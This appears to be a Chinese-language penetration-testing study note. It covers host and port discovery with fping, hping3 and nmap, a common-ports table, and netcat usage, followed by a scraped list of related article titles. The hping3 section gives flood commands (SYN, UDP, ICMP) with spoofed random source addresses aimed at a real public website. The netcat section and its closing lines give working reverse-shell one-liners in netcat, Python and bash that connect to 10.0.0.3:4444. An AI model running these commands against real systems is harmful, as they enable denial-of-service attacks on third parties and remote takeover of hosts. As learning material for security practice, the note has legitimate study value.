三层发现(网络层)

最常用ping命令,但是如果防火墙一开,就无法ping到对方。三层发现的优点在于,arping只能发现同一个网段的用户,而三层发现可以发现不同网段但是互联的用户

fping

-a 存活主机
-b 数据包大小
-f 从文件中读取ip(不能和-g同时使用)
-l 循环ping
-g 网段,开始-结束地址
-u 不可达,ping不通

图一没有设置范围,图二设置了扫描的开始地址和结束地址,如果没有设置范围,就默认从头扫到尾。

2>/dev/null 是为了防止奇怪的输出

hping3

可以发动ddos攻击,主要用于ddos,但不好测试,一旦使用对自己和他人的网络都有威胁。

数据包要大,发的要快

-a:                  伪造源ip(隐藏自己)
-c:                  发包的数目
-p:                  端口
-d:                  发包大小
-i:                   发包间隔
-w:                 滑动窗口大小
--flood               尽快发送数据包,不回复
--rand-source    随机源地址(-a是指定一个伪造ip,这是随机)

--udp       udp攻击
--icmp      icmp攻击
-S            syn攻击
-A            ack攻击

hping3 --upd -c 1000000 -d 120 -p 80 -w 64 --flood --rand-source www.baidu.com
hping3 --icmp -c 1000000 -d 120 -p 80 -w 64 --flood --rand-source www.baidu.com
hping3 -S -c 1000000 -d 120 -p 80 -w 64 --flood --rand-source www.baidu.com

四层发现(传输层)

依靠TCP/UDP传输——可靠、TCP的三次握手——花费时间长

如果防火墙关闭icmp二层,三层命令直接gg,无法ping通,但是四层发现可以通过端口来检测

nmap

主机发现

-sn:只探测存活(基于icmp,开防火墙无效)
-Pn:只探测端口(开防火墙有效)

-O :操作系统探测

端口探测
-sS:tcp syn扫描 扫端口(常用,最好用,速度快,隐蔽性好,第三次握手没实现)
-p :端口,(80,8080)——探测80和8080端口

(-p-)——探测全部的端口

(80-8080)——探测80到8080的端口

nmap默认扫描范围为1——1000

nmap -p -sS 80 192.168.111.131

nmap -p- -sS192.168.111.131

nmap -p 80-8080 -sS192.168.111.131
-sV:探测服务版本(很重要,可利用版本漏洞)
-A :综合扫描
-iL:指定文件扫描

--exclude:            排除ip
--excludefile:        指定文件列表
--script=vuln:       常见漏洞扫描

nmap的保存和输出

nmap -F -oN test.txt IP/24

 常见端口号

端口 端口说明
21 ftp
22 ssh
23 telnet
80 http
443 https
139 samba
3306 mysql
3389 RDP远程桌面

NC(netcat)

shell——命令解释器 

反弹shell

让恶意程序主动连接我们

使用场景:蚁剑 → 服务器(反弹)kali监听 → 提权

-c | -e 执行指令
-v 详细信息, -vv 更详细
-l listen 监听
-n ip的形式指定连接地址,非域名
-p 指定端口
-q 结束延迟
-w 超时时间
-z 零输入输出,只扫端口 可以指定范围,例如80-8080

kali 输入ip:正向
win7 输入ip:反向

kali: nc -lvvp 4444 -e 
win7: nc kaliIp 4444 - e cmd

反向连接:

正向连接:

 传输文件:

Server:nc < fileName
Client:nc > fileName

端口探测:

 乱码解决:

拿反向连接举例,会发现连接成功之后会有乱码出现

出现乱码的原因其实是两个系统的编码不同

kali:     utf-8 一个字占3字节
win7: gbk  一个字占2字节

因此win7到kali,出现了乱码,解决方案——chcp命令

chcp 65001 utf-8
chcp 936 gbk

 一些反弹shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.3",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

bash -c 'exec bash -i &>/dev/tcp/10.0.0.3/4444 <&1'

内网渗透笔记——三层发现and四层发现相关推荐

  1. 三层内网渗透笔记-靶场(teamssix.com)

    环境搭建 参考:https://blog.csdn.net/qq_63844103/article/details/126195711 宝塔映射 端口 target 1和target2 开始: tar ...

  2. 内网渗透笔记——二层发现

    一.OSI七层模型 物理层 数据链路层 网络层 传输层 会话层 表示层 应用层 那所谓二层发现(交换机,mac地址,arp),就是利用数据链路层进行主机的发现 三层--利用ping命令 arping命 ...

  3. 内网渗透、三层拓扑、红队考核靶场(ack123)

    前言 1.此靶场出自暗月团队 2.因为自己搭环境有点复杂,而且这么多台机器卡死了,我先把所有的杀软手动卸载了,不然因为环境问题处差错不好排查,免杀部分单独学习了! 环境搭建 https://www.b ...

  4. 红日安全内网渗透笔记

    靶场下载地址:漏洞详情 环境配置参考:[红日安全-VulnStack]ATT&CK实战系列--红队实战(二) - yokan - 博客园 此实战仅有3台机器 DMZ区的WEB机 .核心区的AD ...

  5. 内网渗透笔记——:)一个笑脸

    打靶机 靶机准备与安装---vulnhub-Metasploitable2-Linux Vulnerable By Design ~ VulnHubVulnHub provides materials ...

  6. 内网渗透笔记——msf

    Masscan 号称五分钟扫遍互联网 性能优越,极限速度 1000w/s,参数 跟 nmap 差不多 -p 80,8000-8100 10.0.0.0/24 --max-rate=100000    ...

  7. 内网渗透笔记——注册表自启动与msi提权

    目的:进行持久化的连接 最简单的自启动: 自启动文件夹:开始➡程序➡启动(win7下) 除了通过文件夹,还可以利用Windows配置文件: win.ini.system.ini.wininit.ini ...

  8. 三层网络靶场搭建MSF内网渗透

    三层网络靶场搭建&MSF内网渗透 在最近的CTF比赛中,综合靶场出现的次数越来越多,这种形式的靶场和真实的内网渗透很像,很贴合实际工作,但我们往往缺少多层网络的练习环境.本文通过VMware搭 ...

  9. 内网渗透|红日安全团队靶场渗透笔记|Mimikatz|MSF跳板

    靶场下载:漏洞详情​​​​​​ 环境搭建: 文件下载下来有三个压缩包,分别对应域中三台主机: VM1对应win7是web服务器 VM2对应windows2003是域成员 VM3对应windows se ...

最新文章

  1. nginx源码分析—内存池结构ngx_pool_t及内存管理
  2. JavaEE基础(04):会话跟踪技术,Session和Cookie详解
  3. cuda cudnn tensorflow对应_Ubuntu18.04下安装Tensorflow+cuda+cudnn+pytorch
  4. 再学C++之C++中的全部关键字
  5. 2021-09-1017. 电话号码的字母组合
  6. gwt执行ajax,使用GWT开发AJAX应用程序
  7. kubernetes(4)Pod的核心概念、Pod的调度
  8. Python编写随机一百个人的姓名,加面试考核得分
  9. dede php低版本出现500错误,织梦后台生成文章提示500错误怎么办
  10. python画车辆轨迹图_如何利用 Python 绘制酷炫的 车辆轨迹 — 速度时空图?三维数据用二维图像呈现...
  11. pandas实现列转行
  12. 拷贝原站点有用文章(合并页)
  13. 大数据量的五种处理方式
  14. Yeelight LED智能灯泡(彩光版)代码控制(含pdf资料)
  15. 马云卸任:中国企业如何走出“创始人驱动”?
  16. DEKRA德凯新设立首席数字官、首席运营官,任命两位新成员加入董事会
  17. 知往鉴今:Chromium近三年UXSS漏洞分析及缓解、预防和检测措施
  18. [毕设自用]图像分割之肺部肺结节医学影像数据集LUNA16的基础知识汇总
  19. 2021.10.02超详细实现过程-Linux 环境下的简易聊天室,采用CS模型,实现多客户端之间的稳定数据传输。(添加好友,删除好友、屏蔽好友、查看好友列表(针对数据库的操作))
  20. Hacking The Box----Awkward

热门文章

  1. 用于提升多样性的Maximum Mutual Information算法
  2. Kanzi自定义插件节点属性、自定义消息以及自定义响应
  3. dango-orm单表操作知识点
  4. 去应用商店给app评分
  5. scrapy爬虫实践之抓取拉钩网招聘信息(2)
  6. RTC实时通信提高音质方法QOS(一)
  7. 编写一个程序实现顺序栈(假设栈中元素类型为char)的各种基本运算
  8. 阿里测试岗,面试官狂问自动化,把我问到哑口无言……
  9. NVDIMM在闪存存储中的应用探讨
  10. bam文件读取_科学网—Pacbio Sequel两种bam文件解析 - 卢锐的博文